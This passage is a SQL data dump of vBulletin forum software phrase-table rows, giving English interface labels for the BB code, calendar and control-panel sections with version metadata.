(32717, -1, 'disable_wordwrap_in_bbcode', 'bbcode', 'Disable Word Wrapping Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1194351268, '3.7.0 Beta 1'),
(32718, -1, 'enter_text_with_bb_code', 'bbcode', 'Enter text with BB code(s):', 'vbulletin', '', 0, ''),
(32719, -1, 'example', 'bbcode', 'Example', 'vbulletin', '', 0, ''),
(32720, -1, 'html', 'bbcode', 'HTML', 'vbulletin', '', 0, ''),
(32721, -1, 'remove_tag_if_empty', 'bbcode', 'Remove Tag If Empty', 'vbulletin', 'vBulletin Solutions', 1194351185, '3.7.0 Beta 1'),
(32722, -1, 'replacement', 'bbcode', 'Replacement', 'vbulletin', '', 0, ''),
(32723, -1, 'test_your_bb_code', 'bbcode', 'Test your BB Code', 'vbulletin', '', 0, ''),
(32724, -1, 'this_is_how_your_test_appeard_after_bb_code_formatting', 'bbcode', 'This is how your text appears after BB code formatting', 'vbulletin', 'vBulletin Solutions', 1206966159, '3.7.0 Release Candidate 2'),
(32725, -1, 'use_option', 'bbcode', 'Use {option}', 'vbulletin', '', 0, ''),
(32726, -1, 'add_new_calendar', 'calendar', 'Add New Calendar', 'vbulletin', '', 0, ''),
(32727, -1, 'add_new_custom_field', 'calendar', 'Add New Custom Field', 'vbulletin', '', 0, ''),
(32728, -1, 'add_new_event', 'calendar', 'Add New Event', 'vbulletin', '', 0, ''),
(32729, -1, 'add_new_holiday', 'calendar', 'Add New Holiday', 'vbulletin', '', 0, ''),
(32730, -1, 'add_new_moderator_to_calendar_x', 'calendar', 'Add New Moderator to Calendar {1} ', 'vbulletin', '', 0, ''),
(32731, -1, 'add_reminder', 'calendar', 'Add Reminder', 'vbulletin', '', 0, ''),
(32732, -1, 'all_day', 'calendar', 'All Day', 'vbulletin', '', 0, ''),
(32733, -1, 'allow_user_to_input_their_own_value_for_this_custom_field', 'calendar', 'Allow user to input their own value for this Custom Field', 'vbulletin', '', 0, ''),
(32734, -1, 'are_you_sure_want_to_delete_calendar_moderator_x', 'calendar', 'Are you sure you want to delete the calendar moderator called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32735, -1, 'are_you_sure_want_to_delete_calendar_x', 'calendar', 'Are you sure you want to delete the calendar called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32736, -1, 'are_you_sure_want_to_delete_custom_calendar_field_x', 'calendar', 'Are you sure you want to delete the custom calendar field called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32737, -1, 'are_you_sure_you_want_to_delete_the_holiday_called_x', 'calendar', 'Are you sure you want to delete the holiday called \'{1}\'?(holidayid: {2}) This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32738, -1, 'birthday_count_max_birthdays_per_day', 'calendar', 'Birthday Count (Sets the maximum number of birthdays to be listed on a single day in the monthly view before a single link to all that day\'s Birthdays is shown instead) ', 'vbulletin', '', 0, ''),
(32739, -1, 'calendar_jump', 'calendar', 'Calendar Jump', 'vbulletin', '', 0, ''),
(32740, -1, 'calendar_manager', 'calendar', 'Calendar Manager', 'vbulletin', '', 0, ''),
(32741, -1, 'calendar_mode', 'calendar', 'Calendar Mode', 'vbulletin', '', 0, ''),
(32742, -1, 'calendar_permissions', 'calendar', 'Calendar Permissions', 'vbulletin', '', 0, ''),
(32743, -1, 'choose_time', 'calendar', 'Choose Time', 'vbulletin', '', 0, ''),
(32744, -1, 'confirm_deletion_of_holiday_x', 'calendar', 'Confirm Deletion of Holiday: {1} ', 'vbulletin', '', 0, ''),
(32745, -1, 'custom_field', 'calendar', 'Custom Field', 'vbulletin', '', 0, ''),
(32746, -1, 'date_first', 'calendar', 'First', 'vbulletin', '', 0, ''),
(32747, -1, 'date_last', 'calendar', 'Last', 'vbulletin', '', 0, ''),
(32748, -1, 'date_range_dfn', 'calendar', 'Date Range Beginning and ending years in the format of: Example: {1} Start year must be greater than 1969. End Year must be less than 2038. ', 'vbulletin', '', 0, ''),
(32749, -1, 'date_x_to_y', 'calendar', '{1} to {2}', 'vbulletin', '', 0, ''),
(32750, -1, 'default_view', 'calendar', 'Default ViewView the user is presented with when they enter the calendar. ', 'vbulletin', '', 0, ''),
(32751, -1, 'delete_event', 'calendar', 'Delete Event', 'vbulletin', '', 0, ''),
(32752, -1, 'delete_reminder_for_this_event', 'calendar', 'Delete Reminder for this Event', 'vbulletin', '', 0, ''),
(32753, -1, 'delete_reminders', 'calendar', 'Delete Reminders', 'vbulletin', '', 0, ''),
(32754, -1, 'edit_calendar_permissions_for_usergroup_x_in_calendar_y', 'calendar', 'Edit Calendar Permissions For Usergroup: {1} in Calendar {2}', 'vbulletin', '', 0, ''),
(32755, -1, 'edit_event', 'calendar', 'Edit Event', 'vbulletin', '', 0, ''),
(32756, -1, 'edit_moderator_x_for_calendar_y', 'calendar', 'Edit Moderator {1} for Calendar {2}', 'vbulletin', '', 0, ''),
(32757, -1, 'eight_hours', 'calendar', 'Eight Hours', 'vbulletin', '', 0, ''),
(32758, -1, 'eighteen_hours', 'calendar', 'Eighteen Hours', 'vbulletin', '', 0, ''),
(32759, -1, 'emails_to_notify_when_event', 'calendar', 'Email Addresses to Notify When There is a New Event (Separate each address with a space or line break) ', 'vbulletin', 'vBulletin Solutions', 1172226853, '3.6.5'),
(32760, -1, 'end', 'calendar', 'End', 'vbulletin', '', 0, ''),
(32761, -1, 'event_count_max_events_per_day', 'calendar', 'Event Count(Sets the maximum number of events to be listed on a single day in the monthly view before a single link to all that day\'s Events is shown instead) ', 'vbulletin', '', 0, ''),
(32762, -1, 'event_date', 'calendar', 'Event Date', 'vbulletin', '', 0, ''),
(32763, -1, 'event_ignores_dst', 'calendar', 'The times shown will remain constant, regardless of DST changes.', 'vbulletin', 'vBulletin Solutions', 1200669279, '3.7.0 Beta 4'),
(32764, -1, 'event_information', 'calendar', 'Event Information', 'vbulletin', '', 0, ''),
(32765, -1, 'event_notification', 'calendar', 'Event Notification', 'vbulletin', '', 0, ''),
(32766, -1, 'event_options', 'calendar', 'Event Options', 'vbulletin', '', 0, ''),
(32767, -1, 'event_posted_for_timezone_x', 'calendar', 'This event was posted for time zone {1} so it will appear to occur on a different day on your calendar.', 'vbulletin', '', 0, ''),
(32768, -1, 'event_poster', 'calendar', 'Event Poster', 'vbulletin', '', 0, ''),
(32769, -1, 'event_reminder', 'calendar', 'Event Reminder', 'vbulletin', '', 0, ''),
(32770, -1, 'event_title_cutoff', 'calendar', 'Event Title Cutoff (Sets the maximum number of characters of an event title that are shown on the monthly view. To disable the cutoff, enter \'0\') ', 'vbulletin', '', 0, ''),
(32771, -1, 'event_uses_dst', 'calendar', 'The times shown may change, depending on DST settings', 'vbulletin', 'vBulletin Solutions', 1200670008, '3.7.0 Beta 4'),
(32772, -1, 'events', 'calendar', 'Events', 'vbulletin', '', 0, ''),
(32773, -1, 'every', 'calendar', 'Every', 'vbulletin', '', 0, ''),
(32774, -1, 'every_weekday', 'calendar', 'Every weekday', 'vbulletin', '', 0, ''),
(32775, -1, 'every_x_days', 'calendar', ' Every \r\n day(s)', 'vbulletin', '', 0, ''),
(32776, -1, 'every_x_y', 'calendar', 'Every {1} {2}', 'vbulletin', '', 0, ''),
(32777, -1, 'four_hours', 'calendar', 'Four Hours', 'vbulletin', '', 0, ''),
(32778, -1, 'fourth', 'calendar', 'Fourth', 'vbulletin', '', 0, ''),
(32779, -1, 'friday_abbr', 'calendar', 'Fri', 'vbulletin', '', 0, ''),
(32780, -1, 'friday_short', 'calendar', 'F', 'vbulletin', '', 0, ''),
(32781, -1, 'holiday', 'calendar', 'Holiday', 'vbulletin', '', 0, ''),
(32782, -1, 'if_you_would_like_to_remove_this_moderator', 'calendar', 'If You Would Like to Remove this Moderator', 'vbulletin', '', 0, ''),
(32783, -1, 'jump_to_month', 'calendar', 'Jump to month', 'vbulletin', '', 0, ''),
(32784, -1, 'maintain_same_time', 'calendar', 'Maintain same time throughout the year, regardless of DST changes', 'vbulletin', 'vBulletin Solutions', 1200669371, '3.7.0 Beta 4'),
(32785, -1, 'members_with_birthdays_on_x', 'calendar', 'Members with Birthdays on {1}', 'vbulletin', '', 0, ''),
(32786, -1, 'midday', 'calendar', 'Midday', 'vbulletin', '', 0, ''),
(32787, -1, 'midnight', 'calendar', 'Midnight', 'vbulletin', '', 0, ''),
(32788, -1, 'moderate_events', 'calendar', 'Moderate Events', 'vbulletin', '', 0, ''),
(32789, -1, 'moderation_options', 'calendar', 'Moderation Options', 'vbulletin', '', 0, ''),
(32790, -1, 'monday_abbr', 'calendar', 'Mon', 'vbulletin', '', 0, ''),
(32791, -1, 'monday_short', 'calendar', 'M', 'vbulletin', '', 0, ''),
(32792, -1, 'monthly_view', 'calendar', 'Monthly View', 'vbulletin', '', 0, ''),
(32793, -1, 'move_event', 'calendar', 'Move Event', 'vbulletin', '', 0, ''),
(32794, -1, 'move_event_to_calendar', 'calendar', 'Move Event to Calendar', 'vbulletin', '', 0, ''),
(32795, -1, 'of', 'calendar', 'of', 'vbulletin', '', 0, ''),
(32796, -1, 'of_every_x_months', 'calendar', 'of every\r\n \r\n month(s)', 'vbulletin', '', 0, ''),
(32797, -1, 'one_day', 'calendar', 'One Day', 'vbulletin', '', 0, ''),
(32798, -1, 'one_hour', 'calendar', 'One Hour', 'vbulletin', '', 0, ''),
(32799, -1, 'or_set_time', 'calendar', 'or Set Time', 'vbulletin', '', 0, ''),
(32800, -1, 'ranged_event', 'calendar', 'Ranged Event', 'vbulletin', '', 0, ''),
(32801, -1, 'recur_every_x_weeks', 'calendar', ' Every \r\n week(s) on', 'vbulletin', '', 0, ''),
(32802, -1, 'recurrence_pattern', 'calendar', 'Recurrence Pattern', 'vbulletin', '', 0, ''),
(32803, -1, 'recurring_event', 'calendar', 'Recurring Event', 'vbulletin', '', 0, ''),
(32804, -1, 'recurring_option', 'calendar', 'Recurring Option', 'vbulletin', '', 0, ''),
(32805, -1, 'reminder', 'calendar', 'Reminder', 'vbulletin', '', 0, ''),
(32806, -1, 'reminder_emails_can_be_early_or_late', 'calendar', 'Reminder emails can be slightly early or late. For example, a reminder scheduled for one hour before the event, will actually be sent between 1:15 and 45 minutes before the event.', 'vbulletin', '', 0, ''),
(32807, -1, 'request_reminder_for_this_event', 'calendar', 'Request Reminder for this Event', 'vbulletin', '', 0, ''),
(32808, -1, 'require_moderator_validation_before_new_events_are_displayed', 'calendar', 'Require moderator validation before new events are displayed', 'vbulletin', '', 0, ''),
(32809, -1, 'saturday_abbr', 'calendar', 'Sat', 'vbulletin', '', 0, ''),
(32810, -1, 'saturday_short', 'calendar', 'S', 'vbulletin', '', 0, ''),
(32811, -1, 'save_event', 'calendar', 'Save Event', 'vbulletin', '', 0, ''),
(32812, -1, 'selected_events', 'calendar', 'Selected Events:', 'vbulletin', '', 0, ''),
(32813, -1, 'show_birthdays_on_this_calendar', 'calendar', 'Show Birthdays on this Calendar', 'vbulletin', '', 0, ''),
(32814, -1, 'show_easter_holidays_on_this_calendar', 'calendar', 'Show predefined holidays on this Calendar', 'vbulletin', '', 0, ''),
(32815, -1, 'show_holidays_on_this_calendar', 'calendar', 'Show admin defined holidays on this Calendar', 'vbulletin', '', 0, ''),
(32816, -1, 'show_today', 'calendar', 'Show Today', 'vbulletin', '', 0, ''),
(32817, -1, 'show_upcoming_events_from_this_calendar', 'calendar', 'Show upcoming events from this Calendar on the forum index\r\n', 'vbulletin', 'vBulletin Solutions', 1214998317, '3.8.0 Alpha 1'),
(32818, -1, 'show_weekend', 'calendar', 'Show Saturday / Sunday on this Calendar (Setting this to \'No\' forces the calendar to display only Monday to Friday, ignoring the user\'s start of week option) ', 'vbulletin', '', 0, ''),
(32819, -1, 'single_all_day_event', 'calendar', 'Single, All Day Event', 'vbulletin', '', 0, ''),
(32820, -1, 'six_hours', 'calendar', 'Six Hours', 'vbulletin', '', 0, ''),
(32821, -1, 'start', 'calendar', 'Start', 'vbulletin', '', 0, ''),
(32822, -1, 'start_of_week', 'calendar', 'Start of the Week (Sets the default first day for the calendar, which will be shown to guests with no start of week preference) ', 'vbulletin', '', 0, ''),
(32823, -1, 'sunday_abbr', 'calendar', 'Sun', 'vbulletin', '', 0, ''),
(32824, -1, 'sunday_short', 'calendar', 'S', 'vbulletin', '', 0, ''),
(32825, -1, 'the_dropdown', 'calendar', 'The', 'vbulletin', '', 0, ''),
(32826, -1, 'the_x_y_of_z', 'calendar', 'The {1} {2} of {3}', 'vbulletin', '', 0, ''),
(32827, -1, 'third', 'calendar', 'Third', 'vbulletin', '', 0, ''),
(32828, -1, 'this_event_occurs_every_weekday', 'calendar', 'This event occurs every weekday', 'vbulletin', '', 0, ''),
(32829, -1, 'this_event_occurs_every_x_days', 'calendar', 'This event occurs every {1} day(s)', 'vbulletin', '', 0, ''),
(32830, -1, 'this_event_occurs_every_x_weeks_on_y', 'calendar', 'This event occurs every {1} week(s) on {2}', 'vbulletin', '', 0, ''),
(32831, -1, 'this_event_occurs_every_x_y', 'calendar', 'This event occurs every {1} {2}', 'vbulletin', '', 0, ''),
(32832, -1, 'this_event_occurs_on_day_x_of_every_y_months', 'calendar', 'This event occurs on day {1} of every {2} month(s)', 'vbulletin', '', 0, ''),
(32833, -1, 'this_event_occurs_on_every_x_y_of_z', 'calendar', 'This event occurs on every {1} {2} of {3}', 'vbulletin', '', 0, ''),
(32834, -1, 'this_event_occurs_on_the_x_y_of_every_z_months', 'calendar', 'This event occurs on the {1} {2} of every {3} month(s)', 'vbulletin', '', 0, ''),
(32835, -1, 'three_days', 'calendar', 'Three Days', 'vbulletin', '', 0, ''),
(32836, -1, 'three_hours', 'calendar', 'Three Hours', 'vbulletin', '', 0, ''),
(32837, -1, 'thursday_abbr', 'calendar', 'Thu', 'vbulletin', '', 0, ''),
(32838, -1, 'thursday_short', 'calendar', 'T', 'vbulletin', '', 0, ''),
(32839, -1, 'time_x_to_y', 'calendar', '{1} to {2} ', 'vbulletin', 'vBulletin Solutions', 1166828986, '3.6.5'),
(32840, -1, 'time_zone', 'calendar', 'Time Zone', 'vbulletin', '', 0, ''),
(32841, -1, 'to_delete_this_event', 'calendar', 'To delete this event, click this box and press the \'Delete Event\' button.', 'vbulletin', '', 0, ''),
(32842, -1, 'tuesday_abbr', 'calendar', 'Tue', 'vbulletin', '', 0, ''),
(32843, -1, 'tuesday_short', 'calendar', 'T', 'vbulletin', '', 0, ''),
(32844, -1, 'twelve_hours', 'calendar', 'Twelve Hours', 'vbulletin', '', 0, ''),
(32845, -1, 'two_days', 'calendar', 'Two Days', 'vbulletin', '', 0, ''),
(32846, -1, 'two_hours', 'calendar', 'Two Hours', 'vbulletin', '', 0, ''),
(32847, -1, 'update_reminders', 'calendar', 'Update Reminders', 'vbulletin', '', 0, ''),
(32848, -1, 'view_this_week_in_detail', 'calendar', 'View This Week in Detail', 'vbulletin', '', 0, ''),
(32849, -1, 'wednesday_abbr', 'calendar', 'Wed', 'vbulletin', '', 0, ''),
(32850, -1, 'wednesday_short', 'calendar', 'W', 'vbulletin', '', 0, ''),
(32851, -1, 'weekly', 'calendar', 'Weekly', 'vbulletin', '', 0, ''),
(32852, -1, 'weekly_view', 'calendar', 'Weekly View', 'vbulletin', '', 0, ''),
(32853, -1, 'when_to_send_reminder_before_event', 'calendar', 'When to send reminder before event', 'vbulletin', '', 0, ''),
(32854, -1, 'x_birthday', 'calendar', '{1}\'s birthday', 'vbulletin', '', 0, ''),
(32855, -1, 'x_birthdays', 'calendar', '{1} Birthdays', 'vbulletin', '', 0, ''),
(32856, -1, 'yearly', 'calendar', 'Yearly', 'vbulletin', '', 0, ''),
(32857, -1, 'yearly_view', 'calendar', 'Yearly View', 'vbulletin', '', 0, ''),
(32858, -1, 'you_have_no_event_reminders', 'calendar', 'You have no event reminders.', 'vbulletin', '', 0, ''),
(32859, -1, 'access_masks', 'cpglobal', 'Access Masks', 'vbulletin', '', 0, ''),
(32860, -1, 'active', 'cpglobal', 'Active', 'vbulletin', 'vBulletin Solutions', 1189774067, '3.6.8'),
(32861, -1, 'add', 'cpglobal', 'Add', 'vbulletin', '', 0, ''),
(32862, -1, 'add_new_notice', 'cpglobal', 'Add New Notice', 'vbulletin', 'vBulletin Solutions', 1189778830, '3.6.8'),
(32863, -1, 'add_new_rss_feed', 'cpglobal', 'Add New RSS Feed', 'vbulletin', 'vBulletin Solutions', 1149264784, '3.6.0 Beta 1'),
(32864, -1, 'add_new_social_bookmarking_site', 'cpglobal', 'Add New Social Bookmarking Site', 'vbulletin', 'vBulletin Solutions', 1190987668, '3.7.0 Beta 1'),
(32865, -1, 'additional_usergroups', 'cpglobal', 'Additional Usergroups', 'vbulletin', '', 0, ''),
(32866, -1, 'administrator_permissions', 'cpglobal', 'Administrator Permissions', 'vbulletin', '', 0, ''),
(32867, -1, 'all_default', 'cpglobal', 'All Default', 'vbulletin', '', 0, ''),
(32868, -1, 'all_no', 'cpglobal', 'All No', 'vbulletin', '', 0, ''),
(32869, -1, 'all_usergroups', 'cpglobal', 'All Usergroups', 'vbulletin', '', 0, ''),
(32870, -1, 'all_users', 'cpglobal', 'All Users', 'vbulletin', '', 0, ''),
(32871, -1, 'all_yes', 'cpglobal', 'All Yes', 'vbulletin', '', 0, ''),
(32872, -1, 'allow_privacy_options', 'cpglobal', 'Allow User Privacy OptionsAllow users to hide the category in their profile from other users of their choosing. ', 'vbulletin', 'vBulletin Solutions', 1215168376, '3.8.0 Alpha 1'),
(32873, -1, 'allow_user_selection', 'cpglobal', 'Allow User Selection', 'vbulletin', '', 0, ''),
(32874, -1, 'announcement_manager', 'cpglobal', 'Announcement Manager', 'vbulletin', '', 0, ''),
(32875, -1, 'are_you_sure_want_to_delete_announcement_x', 'cpglobal', 'Are you sure you want to delete the announcement called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32876, -1, 'are_you_sure_want_to_delete_bookmarksite_x', 'cpglobal', 'Are you sure you want to delete the social bookmarking site called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1190989911, '3.7.0 Beta 1'),
(32877, -1, 'ascending', 'cpglobal', 'Ascending', 'vbulletin', '', 0, ''),
(32878, -1, 'avatars', 'cpglobal', 'Avatars', 'vbulletin', '', 0, ''),
(32879, -1, 'banned_users', 'cpglobal', 'Banned Users', 'vbulletin', '', 0, ''),
(32880, -1, 'check_all', 'cpglobal', 'Check All', 'vbulletin', '', 0, ''),
(32881, -1, 'child_of_x', 'cpglobal', 'Child of {1}', 'vbulletin', '', 0, ''),
(32882, -1, 'click_for_help_on_these_options', 'cpglobal', 'Click for help on these options', 'vbulletin', '', 0, ''),
(32883, -1, 'click_for_help_on_this_option', 'cpglobal', 'Click for help on this option', 'vbulletin', '', 0, ''),
(32884, -1, 'click_here_to_continue_processing', 'cpglobal', 'Click here to continue processing ...', 'vbulletin', '', 0, ''),
(32885, -1, 'close', 'cpglobal', 'Close', 'vbulletin', '', 0, ''),
(32886, -1, 'color_key', 'cpglobal', 'Color Key', 'vbulletin', '', 0, ''),
(32887, -1, 'completed', 'cpglobal', 'Completed', 'vbulletin', '', 0, ''),
(32888, -1, 'confirm_deletion', 'cpglobal', 'Confirm Deletion', 'vbulletin', '', 0, ''),
(32889, -1, 'confirm_deletion_x', 'cpglobal', 'Confirm Deletion: {1} ', 'vbulletin', '', 0, ''),
(32890, -1, 'continue', 'cpglobal', 'Continue', 'vbulletin', '', 0, ''),
(32891, -1, 'control_panel_log', 'cpglobal', 'Control Panel Log', 'vbulletin', '', 0, ''),
(32892, -1, 'controls', 'cpglobal', 'Controls', 'vbulletin', '', 0, ''),
(32893, -1, 'creator', 'cpglobal', 'Creator', 'vbulletin', 'vBulletin Solutions', 1215686797, '3.8.0 Alpha 1'),
(32894, -1, 'customized_using_custom_permissions_for_this_usergroup', 'cpglobal', 'Customized: Using custom permissions for this usergroup', 'vbulletin', '', 0, ''),
(32895, -1, 'data_validation_type', 'cpglobal', 'Data Validation Type', 'vbulletin', '', 0, ''),
(32896, -1, 'database_backup', 'cpglobal', 'Database Backup', 'vbulletin', '', 0, ''),
(32897, -1, 'default_view_age', 'cpglobal', 'Default View Age (Default date cut-off for thread display) ', 'vbulletin', 'vBulletin Solutions', 1178286873, '3.6.6'),
(32898, -1, 'delete_all', 'cpglobal', 'Delete All', 'vbulletin', '', 0, ''),
(32899, -1, 'delete_moderator', 'cpglobal', 'Delete Moderator', 'vbulletin', '', 0, ''),
(32900, -1, 'delete_this_category', 'cpglobal', 'Delete this Category', 'vbulletin', 'vBulletin Solutions', 1215685758, '3.8.0 Alpha 1'),
(32901, -1, 'descending', 'cpglobal', 'Descending', 'vbulletin', '', 0, ''),
(32902, -1, 'description', 'cpglobal', 'Description', 'vbulletin', '', 0, ''),
(32903, -1, 'developer_options', 'cpglobal', 'Developer Options', 'vbulletin', 'vBulletin Solutions', 1151345857, '3.6.0 Beta 4'),
(32904, -1, 'diagnostics', 'cpglobal', 'Diagnostics', 'vbulletin', '', 0, ''),
(32905, -1, 'disable', 'cpglobal', 'Disable', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32906, -1, 'display_order', 'cpglobal', 'Display Order', 'vbulletin', '', 0, ''),
(32907, -1, 'download', 'cpglobal', 'Download', 'vbulletin', '', 0, ''),
(32908, -1, 'edit_text', 'cpglobal', 'Edit Text', 'vbulletin', '', 0, ''),
(32909, -1, 'either', 'cpglobal', 'Either', 'vbulletin', '', 0, ''),
(32910, -1, 'enable', 'cpglobal', 'Enable', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32911, -1, 'enable_disable_features', 'cpglobal', 'Enable / Disable Features', 'vbulletin', '', 0, ''),
(32912, -1, 'enabled', 'cpglobal', 'Enabled', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32913, -1, 'error', 'cpglobal', 'Error', 'vbulletin', '', 0, ''),
(32914, -1, 'exact_match', 'cpglobal', 'Exact Match', 'vbulletin', '', 0, ''),
(32915, -1, 'execute_sql_query', 'cpglobal', 'Execute SQL Query', 'vbulletin', '', 0, ''),
(32916, -1, 'expand_all', 'cpglobal', 'Expand All', 'vbulletin', '', 0, ''),
(32917, -1, 'field_required', 'cpglobal', 'Field Required', 'vbulletin', '', 0, ''),
(32918, -1, 'filename', 'cpglobal', 'Filename', 'vbulletin', '', 0, ''),
(32919, -1, 'find', 'cpglobal', 'Find', 'vbulletin', '', 0, ''),
(32920, -1, 'find_all_threads_older_than_days', 'cpglobal', 'Find All Threads Older Than X Days', 'vbulletin', '', 0, ''),
(32921, -1, 'forum_and_children', 'cpglobal', 'Forum (Also applies to child forums) ', 'vbulletin', '', 0, ''),
(32922, -1, 'generate_mailing_list', 'cpglobal', 'Generate Mailing List', 'vbulletin', '', 0, ''),
(32923, -1, 'global_announcements', 'cpglobal', 'Global Announcements', 'vbulletin', '', 0, ''),
(32924, -1, 'help', 'cpglobal', 'Help', 'vbulletin', '', 0, ''),
(32925, -1, 'here_you_may_edit_forum_access_on_a_user_by_user_basis', 'cpglobal', 'Here you may edit forum access on a user-by-user basis. Selecting \"Yes\" will allow the user access to the forum. Selecting \"No\" will deny the user access to the forum. Any changes made to one user\'s account will override the default permission settings in their usergroup. Selecting \"Default\" will revert the user to the default permissions settings for their usergroup. (Please note that the permission inheritance system still works here.) (Ensure that you have access masks enabled before attempting to use these!)', 'vbulletin', '', 0, ''),
(32926, -1, 'home_page', 'cpglobal', 'Home Page', 'vbulletin', '', 0, ''),
(32927, -1, 'host_name', 'cpglobal', 'Host Name', 'vbulletin', '', 0, ''),
(32928, -1, 'hour', 'cpglobal', 'Hour', 'vbulletin', '', 0, ''),
(32929, -1, 'html_content_type', 'cpglobal', 'HTML Content Type', 'vbulletin', '', 0, ''),
(32930, -1, 'icon', 'cpglobal', 'Icon', 'vbulletin', 'vBulletin Solutions', 1190988616, '3.7.0 Beta 1'),
(32931, -1, 'icon_bookmarksite_help', 'cpglobal', 'Filename for Icon. This must be placed in your misc image directory (default: images/misc).', 'vbulletin', 'vBulletin Solutions', 1190989024, '3.7.0 Beta 1'),
(32932, -1, 'if_you_are_not_automatically_redirected_click_here_x', 'cpglobal', 'If you are not automatically redirected, please click here .', 'vbulletin', '', 0, ''),
(32933, -1, 'if_you_change_display_order', 'cpglobal', 'If you change the display orders, please be sure to submit the form using the \'Save Display Order\' button at the bottom of the page', 'vbulletin', '', 0, ''),
(32934, -1, 'image', 'cpglobal', 'Image', 'vbulletin', '', 0, ''),
(32935, -1, 'import', 'cpglobal', 'Import', 'vbulletin', '', 0, ''),
(32936, -1, 'import_xml_file', 'cpglobal', 'OR import the XML file from your server', 'vbulletin', '', 0, ''),
(32937, -1, 'invalid_action_specified', 'cpglobal', 'Invalid Action Specified', 'vbulletin', 'vBulletin Solutions', 1204725447, '3.7.0 Beta 6'),
(32938, -1, 'invalid_forum_parenting', 'cpglobal', 'Invalid forum parenting setup. Contact vBulletin support.', 'vbulletin', '', 0, ''),
(32939, -1, 'language', 'cpglobal', 'Language', 'vbulletin', '', 0, ''),
(32940, -1, 'large_edit_box', 'cpglobal', 'Large Edit Box', 'vbulletin', '', 0, ''),
(32941, -1, 'link', 'cpglobal', 'Link', 'vbulletin', 'vBulletin Solutions', 1190988678, '3.7.0 Beta 1'),
(32942, -1, 'link_replacement_variables_help', 'cpglobal', 'Replacement variables: {URL} is the given page url, {TITLE} is the given page title.', 'vbulletin', 'vBulletin Solutions', 1190988696, '3.7.0 Beta 1'),
(32943, -1, 'logged_in_user_x_executed_y_queries', 'cpglobal', 'Logged-in user: {1}; Executed {2} queries.', 'vbulletin', '', 0, ''),
(32944, -1, 'logs', 'cpglobal', 'Logs', 'vbulletin', '', 0, ''),
(32945, -1, 'maintenance', 'cpglobal', 'Maintenance', 'vbulletin', '', 0, ''),
(32946, -1, 'mass_move', 'cpglobal', 'Mass Move', 'vbulletin', '', 0, ''),
(32947, -1, 'max_length_of_allowed_user_input', 'cpglobal', 'Max length of allowed user input', 'vbulletin', '', 0, ''),
(32948, -1, 'maximum_chars_x', 'cpglobal', 'Maximum Chars: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32949, -1, 'minimum_posts', 'cpglobal', 'Minimum Posts', 'vbulletin', '', 0, ''),
(32950, -1, 'minute', 'cpglobal', 'Minute', 'vbulletin', '', 0, ''),
(32951, -1, 'moderation', 'cpglobal', 'Moderation', 'vbulletin', '', 0, ''),
(32952, -1, 'moderator_log', 'cpglobal', 'Moderator Log', 'vbulletin', '', 0, ''),
(32953, -1, 'moderator_username', 'cpglobal', 'Moderator Username', 'vbulletin', '', 0, ''),
(32954, -1, 'moderator_usernames', 'cpglobal', 'Moderator Usernames', 'vbulletin', 'vBulletin Solutions', 1191255776, '3.7.0 Beta 1'),
(32955, -1, 'modify', 'cpglobal', 'Modify', 'vbulletin', '', 0, ''),
(32956, -1, 'move', 'cpglobal', 'Move', 'vbulletin', '', 0, ''),
(32957, -1, 'no_file_uploaded_and_no_local_file_found', 'cpglobal', 'No file uploaded and no local file found. {1}', 'vbulletin', '', 0, ''),
(32958, -1, 'no_one', 'cpglobal', 'No one', 'vbulletin', '', 0, ''),
(32959, -1, 'no_posting', 'cpglobal', 'No Posting', 'vbulletin', '', 0, ''),
(32960, -1, 'notices_manager', 'cpglobal', 'Notices Manager', 'vbulletin', 'vBulletin Solutions', 1189770839, '3.6.8'),
(32961, -1, 'order_by', 'cpglobal', 'Order By', 'vbulletin', '', 0, ''),
(32962, -1, 'order_by_date', 'cpglobal', 'Order By Date', 'vbulletin', '', 0, ''),
(32963, -1, 'order_by_username', 'cpglobal', 'Order By User Name', 'vbulletin', '', 0, ''),
(32964, -1, 'page', 'cpglobal', 'Page', 'vbulletin', '', 0, ''),
(32965, -1, 'parent_forum', 'cpglobal', 'Parent Forum', 'vbulletin', '', 0, ''),
(32966, -1, 'parent_style', 'cpglobal', 'Parent Style', 'vbulletin', '', 0, ''),
(32967, -1, 'permanent', 'cpglobal', 'Permanent', 'vbulletin', '', 0, ''),
(32968, -1, 'phrase_type', 'cpglobal', 'Phrase Type', 'vbulletin', '', 0, ''),
(32969, -1, 'phrases', 'cpglobal', 'Phrases', 'vbulletin', '', 0, ''),
(32970, -1, 'please_wait', 'cpglobal', 'Please Wait...', 'vbulletin', '', 0, ''),
(32971, -1, 'primary_usergroup', 'cpglobal', 'Primary Usergroup', 'vbulletin', '', 0, ''),
(32972, -1, 'processing_complete_proceed', 'cpglobal', 'Processing Complete - Proceed', 'vbulletin', '', 0, ''),
(32973, -1, 'processing_x', 'cpglobal', 'Processing: {1}', 'vbulletin', '', 0, ''),
(32974, -1, 'product', 'cpglobal', 'Product', 'vbulletin', '', 0, ''),
(32975, -1, 'promotions', 'cpglobal', 'Promotions', 'vbulletin', '', 0, ''),
(32976, -1, 'prune', 'cpglobal', 'Prune', 'vbulletin', '', 0, ''),
(32977, -1, 'prune_post_edit_history', 'cpglobal', 'Prune Post Edit History', 'vbulletin', '', 0, ''),
(32978, -1, 'question', 'cpglobal', 'Question', 'vbulletin', '', 0, ''),
(32979, -1, 'quick_search', 'cpglobal', 'Quick Search', 'vbulletin', '', 0, ''),
(32980, -1, 'rebuild_style_information', 'cpglobal', 'Rebuild Style Information', 'vbulletin', '', 0, ''),
(32981, -1, 'reminder', 'cpglobal', 'Reminder', 'vbulletin', '', 0, ''),
